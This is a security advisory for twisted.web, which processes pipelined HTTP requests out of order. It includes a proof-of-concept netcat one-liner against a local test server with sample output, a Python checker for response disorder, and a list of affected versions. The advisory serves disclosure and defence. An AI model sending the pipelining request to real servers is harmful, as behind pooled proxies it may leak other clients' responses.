GHSA-c8m8-j448-xjx7

Source
https://github.com/advisories/GHSA-c8m8-j448-xjx7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-c8m8-j448-xjx7/GHSA-c8m8-j448-xjx7.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-c8m8-j448-xjx7
Aliases
Published
2024-07-29T16:33:11Z
Modified
2024-07-29T16:56:56.788143Z
Severity
  • 8.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
  • 6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L
Summary
twisted.web has disordered HTTP pipeline response
Details

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

  1. Start a fresh Debian container:
    docker run --workdir /repro --rm -it debian:bookworm-slim
    
  2. Install twisted and its dependencies:
    apt -y update && apt -y install ncat git python3 python3-pip \
        && git clone --recurse-submodules https://github.com/twisted/twisted \
        && cd twisted \
        && pip3 install --break-system-packages .
    
  3. Run a twisted.web HTTP server that echoes the method of each received request, for example:
    from twisted.web import server, resource
    from twisted.internet import reactor
    
    class TheResource(resource.Resource):
        isLeaf = True
    
        def render_GET(self, request) -> bytes:
            return b"GET"
    
        def render_POST(self, request) -> bytes:
            return b"POST"
    
    site = server.Site(TheResource())
    reactor.listenTCP(80, site)
    reactor.run()
    
  4. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:
    (printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
    
  5. Observe that the responses arrive out of order:
    HTTP/1.1 200 OK
    Server: TwistedWeb/24.3.0.post0
    Date: Tue, 09 Jul 2024 06:19:41 GMT
    Content-Length: 5
    Content-Type: text/html
    
    POST
    HTTP/1.1 200 OK
    Server: TwistedWeb/24.3.0.post0
    Date: Tue, 09 Jul 2024 06:19:42 GMT
    Content-Length: 4
    Content-Type: text/html
    
    GET
    HTTP/1.1 200 OK
    Server: TwistedWeb/24.3.0.post0
    Date: Tue, 09 Jul 2024 06:19:42 GMT
    Content-Length: 5
    Content-Type: text/html
    
    POST
    

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.
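
A regression check for the ordering shown in steps 4 and 5 of the PoC, as an added example that is not part of the advisory or of Twisted: it splits a captured stream of pipelined responses by `Content-Length` and reports the first response that does not answer the request sent at that position. The function names are hypothetical, the sample captures are constructed, and the check assumes the step 3 server, whose response body is the request method.

```python
from typing import List, Optional

def split_responses(raw: bytes) -> List[bytes]:
    """Split a stream of Content-Length-framed HTTP/1.1 responses into bodies."""
    bodies, pos = [], 0
    while pos < len(raw):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end == -1:
            raise ValueError("truncated response head")
        length = None
        for line in raw[pos:head_end].split(b"\r\n")[1:]:  # skip status line
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        if length is None:
            raise ValueError("response without Content-Length")
        start = head_end + 4
        if start + length > len(raw):
            raise ValueError("truncated response body")
        bodies.append(raw[start:start + length])
        pos = start + length
    return bodies

def first_disorder(sent_methods: List[str], raw: bytes) -> Optional[int]:
    """Index of the first response that does not answer the request sent at
    that position, or None if every response matches. Assumes the step 3
    server, whose response body is the request method."""
    bodies = split_responses(raw)
    for i, method in enumerate(sent_methods):
        if i >= len(bodies) or bodies[i] != method.encode():
            return i
    # Every request was answered in order; flag any surplus response.
    return None if len(bodies) == len(sent_methods) else len(sent_methods)

def _response(body: bytes) -> bytes:
    # Constructed sample response; Content-Length is computed from the body.
    return b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n" % len(body) + body

SENT = ["POST", "POST", "GET"]  # request order from step 4
# Constructed captures: body order as in step 5, and the expected order.
DISORDERED = b"".join(_response(b) for b in (b"POST", b"GET", b"POST"))
IN_ORDER = b"".join(_response(b) for b in (b"POST", b"POST", b"GET"))

if __name__ == "__main__":
    for label, capture in (("disordered", DISORDERED), ("in order", IN_ORDER)):
        print(label, "->", first_disorder(SENT, capture))
```

To test a deployment, pass the bytes captured from the step 4 connection as `raw`; a fixed server should yield `None`.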

References

Affected packages

PyPI / twisted

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (Unknown introduced version / All previous versions are affected)
Fixed
24.7.0rc1

Affected versions

1.*

1.0.1
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.1.0
1.1.1
1.2.0

2.*

2.1.0
2.4.0
2.5.0

8.*

8.0.0
8.0.1
8.1.0
8.2.0

9.*

9.0.0

10.*

10.0.0
10.1.0
10.2.0

11.*

11.0.0
11.1.0

12.*

12.0.0
12.1.0
12.2.0
12.3.0

13.*

13.0.0
13.1.0
13.2.0

14.*

14.0.0
14.0.1
14.0.2

15.*

15.0.0
15.1.0
15.2.0
15.2.1
15.3.0
15.4.0
15.5.0

16.*

16.0.0
16.1.0
16.1.1
16.2.0
16.3.0
16.3.1
16.3.2
16.4.0
16.4.1
16.5.0rc1
16.5.0rc2
16.5.0
16.6.0rc1
16.6.0
16.7.0rc1
16.7.0rc2

17.*

17.1.0rc1
17.1.0
17.5.0
17.9.0rc1
17.9.0

18.*

18.4.0rc1
18.4.0
18.7.0rc1
18.7.0rc2
18.7.0
18.9.0rc1
18.9.0

19.*

19.2.0rc1
19.2.0rc2
19.2.0
19.2.1
19.7.0rc1
19.7.0
19.10.0rc1
19.10.0

20.*

20.3.0rc1
20.3.0

21.*

21.2.0rc1
21.2.0
21.7.0rc1
21.7.0rc2
21.7.0rc3
21.7.0

22.*

22.1.0rc1
22.1.0
22.2.0rc1
22.2.0
22.4.0rc1
22.4.0
22.8.0rc1
22.8.0
22.10.0rc1
22.10.0

23.*

23.8.0rc1
23.8.0
23.10.0rc1
23.10.0

24.*

24.2.0rc1
24.3.0

Database specific

{
    "last_known_affected_version_range": "<= 24.3.0"
}